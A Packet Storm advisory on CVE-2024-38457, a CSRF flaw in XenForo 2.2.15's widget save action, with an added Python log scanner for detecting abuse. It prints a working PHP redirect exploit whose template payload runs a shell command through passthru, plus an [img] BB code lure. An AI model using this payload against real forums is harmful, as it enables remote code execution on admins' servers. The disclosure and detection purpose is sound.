
XenForo 2.2.15 Cross Site Request Forgery

Published: 17 Jul 2024 00:00:00. Reported by EgiX, karmainsecurity.com. Type: packetstorm. Source: packetstormsecurity.com. 1014 views.

XenForo 2.2.15 Cross-Site Request Forgery Vulnerability, allows CSRF-based Remote Code Execution, affects versions <= 2.2.1

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | XenForo 2.2.15 Cross Site Request Forgery Vulnerability | 17 Jul 2024 00:00 | zdt |
| Circl | CVE-2024-38457 | 30 Jul 2024 06:07 | circl |
| CNNVD | XenForo Cross-Site Request Forgery Vulnerability | 16 Jun 2024 00:00 | cnnvd |
| CVE | CVE-2024-38457 | 16 Jun 2024 00:00 | cve |
| Cvelist | CVE-2024-38457 | 16 Jun 2024 00:00 | cvelist |
| NVD | CVE-2024-38457 | 16 Jun 2024 15:15 | nvd |
| OSV | CVE-2024-38457 | 16 Jun 2024 15:15 | osv |
| Positive Technologies | PT-2024-28013 · Xenforo · Xenforo | 16 Jun 2024 00:00 | ptsecurity |
| RedhatCVE | CVE-2024-38457 | 23 May 2025 09:10 | redhatcve |
| Vulnrichment | CVE-2024-38457 | 16 Jun 2024 00:00 | vulnrichment |
-------------------------------------------------------------------------------
XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
-------------------------------------------------------------------------------
  
  
[-] Software Link:  
  
https://xenforo.com  
  
  
[-] Affected Versions:  
  
Version 2.2.15 and prior versions.  
  
  
[-] Vulnerability Description:  
  
The XF\Admin\Controller\Widget::actionSave() method, defined in the
/src/XF/Admin/Controller/Widget.php script, does not check whether the
current HTTP request is a POST or a GET before saving a widget.
XenForo performs its anti-CSRF checks for POST requests only, so this
method can be abused in a Cross-Site Request Forgery (CSRF) attack to
create or modify arbitrary XenForo widgets via GET requests, and this
can also be combined with KIS-2024-06 to perform CSRF-based Remote Code
Execution (RCE) attacks.
  
Furthermore, XenForo implements a BB code system, so this vulnerability
could also be exploited through "stored CSRF" attacks by abusing the
[img] BB code tag, creating a thread or a private message (to be sent
to the victim user) like the following:
  
[img]https://attacker.website/exploit.php[/img]  
  
Where the exploit.php script hosted on the attacker-controlled website  
could be something like this:  
  
```php
<?php

$url = "https://victim.website/xenforo/";

// The victim's browser fetches this script as the [img] source and is
// redirected to the widget save action; XenForo's CSRF check covers POST
// only, so the GET is accepted. The Location value must stay on one line:
// header() rejects values containing a newline.
header("Location: {$url}admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]={{\$xf.app.em.getRepository('XF\\Util\\Arr').filterRecursive(['id'],'passthru')}}");

?>
```
  
Successful exploitation of this vulnerability requires a victim user  
with permissions to administer styles or widgets to be currently  
logged into the Admin Control Panel.  
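The two signals the description above gives a defender are a state-changing widget save arriving as a GET and a Referer that is not the forum itself. As an added example (not part of the advisory), the following parses combined-format access-log lines and flags such requests; the log lines, the site hostname forum.example and the function names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Jul/2024:10:01:02 +0000] "GET /xenforo/admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]=%7B%7B%24xf.app.em%7D%7D HTTP/1.1" 303 0 "https://attacker.example/exploit.php" "Mozilla/5.0"
203.0.113.7 - - [16/Jul/2024:10:02:15 +0000] "POST /xenforo/admin.php?widgets/save HTTP/1.1" 303 0 "https://forum.example/xenforo/admin.php?widgets/add" "Mozilla/5.0"
198.51.100.4 - - [16/Jul/2024:10:03:00 +0000] "GET /xenforo/admin.php?widgets/ HTTP/1.1" 200 4523 "https://forum.example/xenforo/admin.php" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_suspicious_widget_save(entry, site_host="forum.example"):
    """Return the list of reasons a widgets/save request looks CSRF-driven, or None."""
    parts = urlsplit(entry["target"])
    if not parts.path.endswith("/admin.php") or not parts.query.startswith("widgets/save"):
        return None
    reasons = []
    if entry["method"] == "GET":
        # The bug: actionSave accepts GET, which bypasses the POST-only CSRF check.
        reasons.append("widget save via GET (CVE-2024-38457)")
    ref_host = urlsplit(entry["referer"]).hostname or ""
    if ref_host != site_host:
        # A legitimate admin save is navigated from the ACP itself.
        reasons.append("cross-site referer " + (ref_host or "(none)"))
    template = parse_qs(parts.query).get("options[template]", [""])[0]
    if "{{" in template:
        # An HTML widget whose template carries expression syntax is the RCE path.
        reasons.append("template expression in options[template]")
    return reasons or None


def scan_log(text, site_host="forum.example"):
    """Scan a whole log; return (ip, method, reasons) for each flagged request."""
    hits = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = is_suspicious_widget_save(entry, site_host)
        if reasons:
            hits.append((entry["ip"], entry["method"], reasons))
    return hits
```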
  
  
[-] Solution:  
  
Update to a fixed version or apply the vendor patches.  
  
  
[-] Disclosure Timeline:  
  
[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure  
[05/06/2024] - Vendor released patches and fixed versions  
[14/06/2024] - CVE identifier requested  
[16/06/2024] - CVE identifier assigned  
[16/07/2024] - Coordinated public disclosure  
  
  
[-] CVE Reference:  
  
The Common Vulnerabilities and Exposures project (cve.mitre.org) has  
assigned the name CVE-2024-38457 to this vulnerability.  
  
  
[-] Credits:  
  
Vulnerability discovered by Egidio Romano.  
  
  
[-] Other References:  
  
https://xenforo.com/community/threads/222133  
https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/  
  
  
[-] Original Advisory:  
  
http://karmainsecurity.com/KIS-2024-05  
  
